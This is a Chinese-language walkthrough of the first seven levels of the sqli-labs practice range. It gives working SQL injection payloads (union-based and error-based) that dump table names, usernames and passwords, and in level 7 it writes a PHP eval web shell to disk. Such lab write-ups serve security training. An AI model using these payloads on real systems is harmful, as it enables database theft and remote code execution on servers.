sqli-labs1-7过关详解

Less-1

1.  进入sqli-labs-master靶场第一关:

输入?id=1 正常

2.  加单引号判断闭合，发现为字符型注入:

输入?id='1'--+正常

3.  使用order by 判断数据库有几列：

输入?id='1'order by 3--+正常

输入?id='1'order by 4--+报错

4.使用联合查询union select 判断回显位置：

输入?id='1' union select 1,2,3--+

5.  发现2和3的回显，判断数据库名称：

输入?id='1' union select 1,2,database()--+

6.  查询到库名后查询库下所有表：

输入?id='1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' and table_name='users'--+

7.  判断users表中下的字段名称：

输入?id='1' union select 1,2,group_concat(id,0x7e,username,0x7e,password) from users--+

Less-2

第二关和第一关差不多，只不过第一关是字符串注入，第二关是数字型注入。
分别输入id=1、id=1’、id=1"是，页面显示无错、错误、错误，说明参数没有被符号包裹，我们猜测为数字型注入。

剩余步骤跟第一关相同

查询当前数据库：
?id=-1 union select 1,database(),3 from information_schema.tables--+
查询表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
查询字段名：
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security'--+
查询用户名：
?id=-1 union select 1,group_concat(username),3 from security.users--+
查询密码：
?id=-1 union select 1,group_concat(password),3 from security.users--+

Less-3

 1.  进入sqli-labs-master靶场第三关。加入参数id

2.  加单引号判断闭合， 通过报错信息可以发现是以单引号和括号进行闭合的。 

输入?id=1')

剩下步骤和前两关相似

查询当前数据库：
?id=-1') union select 1,database(),3 from information_schema.tables--+
查询表名
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
查询字段名：
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security'--+
查询用户名：
?id=-1') union select 1,group_concat(username),3 from security.users--+
查询密码：
?id=-1') union select 1,group_concat(password),3 from security.users--+

Less-4

id=1和id=1’是都为无错，id=1"时页面错误，并且提示’“1"”) LIMIT 0,1’处有语法错误，我们发现参数被括号包裹，并且单引号变成了双引号

和less-3闭合方式一样，把单引号换成双引号

Less-5

1.  进入sqli-labs-master靶场第五关。加入参数id

2.发现没有回显，判断闭合方式为单引号闭合。

3.  爆库名：

?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1) --+

4.  爆表名

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+

 5.  发现只有1列 加入参数:

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

6.  爆列名：

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

7.  爆出数据：

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,password)from users),0x7e),1) --+

Less-6

 1.  进入sqli-labs-master靶场第六关。加入参数id

2. 发现字符串型，数字型都报错，尝试报错注入查询数据库：

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

3.查询数据库下表：

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) --+

4.查看users表下字段：

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e)) --+

5.查看字段下所有数据：

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(id,0x7e,username,0x7e,password) from users),0x7e)) --+

Less-7

1.  进入sqli-labs-master靶场第七关。加入参数id

2.  判断闭合为 -存在'))闭合

3.   判断它是否具有读写权限 (存在)

4.  使⽤联合查询 union select，将⼀句话⽊⻢写⼊:

union select 1,2,"<?php @eval($ POST['pass']);?>" into outfile "D:\lphpstudy_pro\\WWW\\sqli

5.  访问http://127.0.0.1/sqli-labs/Less-7/m.php